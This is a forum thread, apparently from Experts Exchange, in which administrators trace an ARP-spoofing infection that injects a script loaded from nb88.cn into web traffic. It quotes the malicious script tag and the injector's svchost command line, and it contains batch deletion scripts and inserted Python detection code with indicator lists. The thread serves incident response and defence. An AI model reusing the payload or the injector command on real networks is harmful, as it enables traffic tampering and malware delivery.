RTPIT asked:
Fast Spreading infection, Unknown to all Virus, Spyware, Malware Cleaners

We have an environment that quickly had a "Malware" infection.  Symptom is Internet Explorer tab reads: "Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled website.  We cannot clean nor find the source of the spreading.  Here is the Java source:  <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I also have HijackThis from these if needed.
RTPIT (ASKER)
Do not click the link above as it points to a known infected domain.
RTPIT (ASKER)
We have found that all machines connected (20ish) to the network with the exception of 1 is experiencing the issue.  No other issues are being reported or found during investigation.
We are also getting this on a number of networked machines.  Anyone have any ideas?  Thanks.
This site identifies the problem, and elsewhere on the site suggests possible solutions

http://malwaredomains.com/?p=223
I have the same problem. Anybody have any ideas?
A temporary fix can be had by creating an entry for nb88.cn in your Hosts file, and redirecting it to 127.0.0.1

http://www.mvps.org/winhelp2002/hosts.htm
I have not been able to detect this with anything.

What is happening? What server is infected, is it web or SQL? And where?

Thanks
My problem is on my web servers. It's broadcasting the message to the world. That fix does not work on a server.
That is true - but please bear in mind that this is someone else's question!  ;-))

What I suggest is that you post a new question into a more appropriate zone (server based, rather than client based), and I'm sure nobody would mind you linking the two questions together by posting cross references.  

Otherwise people reading this are going to get confused!
I posted the question under the security/misc group.
I've copied this from my answer at https://www.experts-exchange.com/questions/23505410/IIS-server-hacked-fuck-th3-w0rld-entered-into-title-cannot-find-infection-anywhere.html, in case it's of use:

Okay.  We've now fixed our problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the Run regkey, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
RTPIT (ASKER)
Thanks Adds21 we are working through our multiple SQL servers right now to find the culprit/culprits.
I have the same problem but SQL is not installed on the infected server. All sites on this machine have the same problem, ASP pages or HTML pages. I think IIS is corrupted. Thanks for the help.
I have the same issue with one of our servers. Does anyone else know what the process was called.
Our server application only uses parameterized stored procedures for accessing the database; I don't see how it could have been vulnerable to an injection attack.
See here:

https://www.experts-exchange.com/questions/23505410/IIS-server-hacked-fuck-th3-w0rld-entered-into-title-cannot-find-infection-anywhere.html

It was my post. The infection is on SQL. Check all the SQL servers and check the Run regkey; you will see a process. Kill it under Task Manager and remove it from startup and you will be OK.

Then use the Windows Malicious Software Removal Tool to scan them all and remove it.
Granted I'm no security expert - I don't even know what to look for when you say "check the Run regkey" - but I haven't been able to see any evidence of a hack. I've scanned the system with AVG and found nothing. The server in question is a stand-alone with no other machines on the domain (and no trusts) and I have only had reports of the offensive page title coming from one network (the owners of the server we're managing). Is it possible that the worm could just be on their internal network and not on the web server?
I am working with a client who has the same issue.  Also with this issue is an inability to browse the web on some machines.  There are no MS SQL servers but there is the smaller engine as well.  Please help.
RTPIT (ASKER)
Chili-  We are in the process of narrowing it down currently.  It seems that any SQL engine is vulnerable.  How large is your network?
RTPIT

The network is about 50 PCs.  About 10 are running the free version of MS SQL, but no full-blown SQL servers on the network.  Has anyone discovered the process to look for, or any virus scanner or malware scanner which detects this PITA?  What is weird is on the machines that cannot connect to the internet they cannot ping the gateway address, but they have access to all the internal applications and servers.  The ARP table sometimes shows the MAC address as all 0 and shows it as invalid.  Wireshark doesn't seem to show anything unusual from one of these machines either, although I am not real sure what to look for.  Any help would be appreciated.

Thanks!
RTPIT (ASKER)
We haven't found any processes running on the servers.  I have scoured them with a fine-tooth comb.  Just to make this more frustrating, if we install a wireless card into one of the "infected" machines and connect to our separate guest network the problem disappears.  The best we can tell, this initial PITA is meant to download the real trouble but Symantec is blocking it.  I used Wireshark, IPView from MS (the former Sysinternals software), and a few open source utilities, and nothing.  I talked with our sister company, an ISP, and they had me try a simple netstat -an to see what ports each machine is listening on.  This didn't give me any answers, just more shots in the dark.
RTPIT

Yep, same thing here. We did the netstat right away but haven't found anything.  If we could at least locate which PC was causing the issue I might be able to get a clue, but this is really getting frustrating.  We even thought maybe our router was compromised and put in a new router.  The only clue we found was that if we spoofed the MAC address of a working machine on an "infected" machine then we could get out.  So whatever is causing this is working at the MAC address level.  Nothing is showing up on Wireshark or any packet sniffer that looks odd to me or any of my staff.  I have suggested shutting every machine on the network down and bringing them back up one by one, testing each one as it comes up to see if it causes the issues.

Also we have the same issue with wireless that you do.  If we put a wireless card in a PC it is fine.  Most likely because the MAC address of the access point is okay for some reason.  I just don't know why or how this is possible.
RTPIT (ASKER)
Chili,

Do you have any machines that are not experiencing the issue?  We have a small handful of machines that are chugging along unaffected.  I have compared them at great lengths, but I haven't found anything that makes one vulnerable and one not.  If you have any ideas, feel free to bounce them off of us.  The environments we are in are very similar.  
RTPIT

We have some machines like yours that seem unaffected; they can browse the web just fine but they still have F*** th3 W0rld! injected in the headers of their webpages.  BTW, changing the router has not helped us out at all either.
All machines on your internal network will appear unaffected; that's the confusing part about this infection. It's an ARP attack: it changes the default gateway of the network to the infected machine via ARP.

Simple way to confirm this: take one of your infected machines and change the IP; it will look clean again.

There is one machine on the network with the ARP process running. Kill that, and all will be corrected.
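The ARP-cache behaviour this reply describes (and the all-zero, "invalid" entries and unreachable gateway reported earlier in the thread) can be checked from a saved `arp -a` listing. The following is an added example, not code from the thread or from any of the posters: the sample listing, the gateway address and the known-good gateway MAC are constructed assumptions. It flags a gateway entry whose MAC differs from the baseline, one MAC answering for more than one IP (a host impersonating the gateway appears under its own address and the gateway's), and all-zero entries.

```python
"""Added example: spot ARP-cache poisoning from `arp -a` output.

Constructed sample, not data from the original thread. The gateway IP,
the known-good gateway MAC and all host MACs are assumptions.
"""
import re
from collections import defaultdict

# Windows `arp -a` style output, constructed for this example.
SAMPLE_ARP_A = """\
Interface: 192.168.5.20 --- 0x2
  Internet Address      Physical Address      Type
  192.168.5.1           00-1b-2c-3d-4e-5f     dynamic
  192.168.5.37          00-1b-2c-3d-4e-5f     dynamic
  192.168.5.50          00-00-00-00-00-00     invalid
  192.168.5.60          08-00-27-aa-bb-cc     dynamic
"""

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return {ip: (mac, type)} from `arp -a` text; MACs normalised to aa-bb-cc-dd-ee-ff."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, typ = m.groups()
            table[ip] = (mac.lower().replace(":", "-"), typ.lower())
    return table


def check_arp_table(table, gateway_ip, known_gateway_mac):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    known = known_gateway_mac.lower().replace(":", "-")
    gw = table.get(gateway_ip)
    if gw is None:
        findings.append(f"gateway {gateway_ip} absent from ARP cache")
    elif gw[0] != known:
        findings.append(f"gateway {gateway_ip} maps to {gw[0]}, expected {known}")
    # One MAC answering for several IPs: the spoofing host shows up under its
    # own address and under the gateway's address.
    by_mac = defaultdict(list)
    for ip, (mac, _) in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if mac == "00-00-00-00-00-00":
            findings.append(f"all-zero MAC for {', '.join(sorted(ips))}")
        elif len(ips) > 1:
            findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return findings


def suspect_hosts(table, gateway_ip):
    """IPs other than the gateway that share the MAC currently held by the gateway entry."""
    gw = table.get(gateway_ip)
    if gw is None:
        return []
    return sorted(ip for ip, (mac, _) in table.items() if mac == gw[0] and ip != gateway_ip)


if __name__ == "__main__":
    t = parse_arp_table(SAMPLE_ARP_A)
    for f in check_arp_table(t, "192.168.5.1", "00-50-56-01-02-03"):
        print("WARNING:", f)
    print("likely spoofer(s):", suspect_hosts(t, "192.168.5.1"))
```

Run it over `arp -a` output captured on an affected and an unaffected machine; the address that shares the gateway's current MAC is the host to pull off the switch. The baseline MAC has to come from somewhere the attacker cannot influence (the router's own console or its label), since every poisoned client cache will agree with itself.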
RTPIT (ASKER)
Bluswitch-  Any ideas what the ARP process is?
ASKER CERTIFIED SOLUTION
stephenevans
(solution text only available to Experts Exchange members)
Sorry, but when I saw the infection, I deleted it so quickly that I didn't write down what it was.
In my case there was an .exe created at the same time as the DLLs and that was called wapsrv.exe.
That sounds familiar. This was an incredible attack; it took hours before we realized what it was, and originally we thought all machines were infected.
RTPIT (ASKER)
I found the culprit. I made 2 scripts, one for 2000 and one for XP/Server:

2000.bat
rem packet.dll, wanpacket.dll, wpcap.dll and npf.sys are the file names of the
rem WinPcap capture library, so a machine that has WinPcap installed on purpose
rem (for Wireshark, for example) loses it too; confirm before running.
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
rem same file set, under the XP/2003 system root
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them, but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one svchost.exe process run by the local user account; its switch was:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
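The -insert switch in the command line above prepends a fixed string to HTTP responses passing through the attacking host, which is why the injected tag shows up ahead of the page's own <HTML> tag in the original question. The following is an added example, not code from the thread: it inspects a raw HTTP response for that pattern. The sample response and page content are constructed; whether a given injector also rewrites Content-Length is not known from the thread, so the length check is a generic one that catches naive in-transit insertion.

```python
"""Added example: detect a script tag injected ahead of an HTML document in
an HTTP response. The sample response below is constructed, not traffic from
the thread; the page content and the injected string are assumptions based on
the snippet quoted in the question."""
import re

INJECTED_MARKER = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
DOC_START = re.compile(r"<!DOCTYPE\b|<html\b", re.IGNORECASE)

# Constructed origin page and the tampered copy a client behind the spoofed
# gateway would receive (injector prepends to the body, header untouched).
ORIGIN_BODY = b"<HTML><head><title>Intranet</title></head><body>hello</body></HTML>"
INJECTED = (b'<script language="JavaScript" src="http://nb88.cn/search/vip.js"></script>'
            b"<title>**** Th3 W0rld!</title> ")


def build_response(body):
    """Minimal HTTP/1.1 response with a correct Content-Length, as an origin would send it."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n"
            % len(body)) + body


CLEAN_RESPONSE = build_response(ORIGIN_BODY)
TAMPERED_RESPONSE = CLEAN_RESPONSE.replace(ORIGIN_BODY, INJECTED + ORIGIN_BODY)


def split_response(raw):
    """Split a raw HTTP/1.x response into (status line, {header: value}, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_response(raw, expected_first_bytes=None):
    """Return a list of findings for a response that may have been altered in transit."""
    _status, headers, body = split_response(raw)
    findings = []
    # 1. Content-Length was set by the origin; an injector that prepends data
    #    without rewriting the header leaves the body longer than declared.
    if "content-length" in headers:
        declared = int(headers["content-length"])
        if declared != len(body):
            findings.append(f"content-length {declared} but body is {len(body)} bytes")
    text = body.decode("utf-8", errors="replace")
    # 2. A script tag sitting before the document root (<!DOCTYPE or <html).
    root = DOC_START.search(text)
    preamble = text[: root.start()] if root else text
    for m in INJECTED_MARKER.finditer(preamble):
        findings.append(f"script tag before document root: {m.group(0)[:80]}")
    # 3. Compare with bytes fetched out-of-band (server console, separate network).
    if expected_first_bytes and not body.startswith(expected_first_bytes):
        findings.append("body does not start with the origin's known content")
    return findings


if __name__ == "__main__":
    for label, resp in (("clean", CLEAN_RESPONSE), ("tampered", TAMPERED_RESPONSE)):
        print(label, inspect_response(resp, ORIGIN_BODY) or "no findings")
```

Fetch the same URL from a suspect client and from a path the attacker cannot touch (the wireless guest network mentioned above, or the server's own console) and compare; since the injection happens on the wire, the copy on the web server's disk will be clean, which is exactly what the server owners in this thread kept seeing.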
RTPIT (ASKER)
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Yep, we found the same thing RTPIT.  Our client is so freaked that they requested we wipe the machine for them and reload everything.
Just another heads-up: the program we found was called arpinsert.exe, triggered from

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

So there may be more variants of this nasty going around.
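The replies above name three different Run-key entries (wapsrv.exe, waptimes.exe, arpinsert.exe) plus an svchost.exe started by the local user rather than by the service control manager. The following is an added example, not code from the thread: it triages saved `reg query` and `wmic process` output for those indicators. The sample output, PIDs, node name and the benign Run entry are constructed; the indicator file names and the -insert argument are the ones quoted in the thread.

```python
"""Added example: triage Run-key entries and the process list for the
indicators named in the thread. Sample `reg query` and `wmic` output is
constructed for this example; PIDs, the node name and the benign entry
are assumptions."""
import csv
import io
import re

# File names quoted by posters in the thread above.
IOC_FILES = {"wapsrv.exe", "waptimes.exe", "arpinsert.exe"}
# Argument shape of the injector command line quoted above.
IOC_CMDLINE = re.compile(r"-insert\s|nb88\.cn", re.IGNORECASE)

# Constructed: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SynTPEnh    REG_SZ    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    waptimes    REG_SZ    c:\windows\system32\waptimes.exe
"""

# Constructed: wmic process get Name,ProcessId,ParentProcessId,ExecutablePath,CommandLine /format:csv
# (wmic emits Node first and the remaining columns alphabetically).
SAMPLE_WMIC = r"""Node,CommandLine,ExecutablePath,Name,ParentProcessId,ProcessId
HOST,C:\WINDOWS\system32\services.exe,C:\WINDOWS\system32\services.exe,services.exe,540,600
HOST,C:\WINDOWS\system32\svchost.exe -k netsvcs,C:\WINDOWS\system32\svchost.exe,svchost.exe,600,900
HOST,C:\WINDOWS\Explorer.EXE,C:\WINDOWS\Explorer.EXE,explorer.exe,1100,1200
HOST,c:\windows\system32\waptimes.exe,c:\windows\system32\waptimes.exe,waptimes.exe,1200,1500
HOST,C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert <script src=http://nb88.cn/search/vip.js></script>,C:\WINDOWS\system32\svchost.exe,svchost.exe,1500,1520
"""


def parse_reg_run(text):
    """Return [(value_name, reg_type, data)] from `reg query ...\Run` output."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s+(REG_\w+)\s+(.+?)\s*$", line)
        if m:
            entries.append(m.groups())
    return entries


def parse_wmic_csv(text):
    """Return {pid: row dict} from `wmic ... /format:csv` output."""
    rows = csv.DictReader(io.StringIO(text.strip()))
    return {int(r["ProcessId"]): r for r in rows}


def exe_name(path):
    """Lower-case file name of a Windows path, with surrounding quotes removed."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def triage_run_keys(entries):
    """Flag Run values whose image is one of the indicator file names."""
    findings = []
    for name, _typ, data in entries:
        m = re.match(r'"?(.*?\.exe)"?', data, re.IGNORECASE)
        image = exe_name(m.group(1)) if m else data.lower()
        if image in IOC_FILES:
            findings.append(f"Run value '{name}' starts known indicator {image}: {data}")
    return findings


def triage_processes(procs):
    """Flag indicator images, svchost.exe not parented by services.exe, and injector arguments."""
    findings = []
    for pid, r in procs.items():
        name = r["Name"].lower()
        parent = procs.get(int(r["ParentProcessId"]))
        parent_name = parent["Name"].lower() if parent else "<unknown>"
        cmd = r["CommandLine"]
        if name in IOC_FILES:
            findings.append(f"pid {pid} {name} (known indicator), parent {parent_name}")
        # Genuine svchost.exe instances are children of services.exe.
        if name == "svchost.exe" and parent_name != "services.exe":
            findings.append(f"pid {pid} svchost.exe started by {parent_name} "
                            f"(pid {r['ParentProcessId']}): {cmd}")
        if IOC_CMDLINE.search(cmd):
            findings.append(f"pid {pid} command line carries injection arguments: {cmd}")
    return findings


if __name__ == "__main__":
    for f in triage_run_keys(parse_reg_run(SAMPLE_REG)) + triage_processes(parse_wmic_csv(SAMPLE_WMIC)):
        print("WARNING:", f)
```

The svchost check is the general one and outlives this particular variant: any svchost.exe whose parent is not services.exe deserves a look regardless of the file names posted here, and the parent it was started by (waptimes.exe in the constructed sample) is usually the Run-key entry you are after.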
SOLUTION
Mohamed Osama
(solution text only available to Experts Exchange members)